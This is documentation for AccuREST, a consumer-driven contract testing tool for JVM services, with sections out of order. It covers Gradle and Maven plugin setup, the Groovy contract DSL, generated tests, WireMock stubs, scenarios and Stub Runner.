Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*[:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nContract DSL in AccuREST is written in Groovy, but don't be alarmed if you didn't use Groovy before. Knowledge of the language is not really needed as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in example above. If you didn't find what you are looking for, please check next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n\n## Top-Level Elements\n\nFollowing methods can be called in the top-level closure of a contract definition. Request and response are mandatory, priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n\n## Request\n\nHTTP protocol requires only **method and address** to be specified in a request. The same information is mandatory in request definition of AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify whole `url` instead of just path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nRequest may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contains passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` functions tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\n**Body's format** can also be specified explicitly by invoking one of format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nMinimal response must contain **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides status response may contain **headers** and **body**, which are specified the same way as in the request (see previous paragraph).\n\n## Regular expressions\nYou can use regular expressions to write your requests in Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your test and your server side tests.\n\n Please see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) }))\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameter for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### 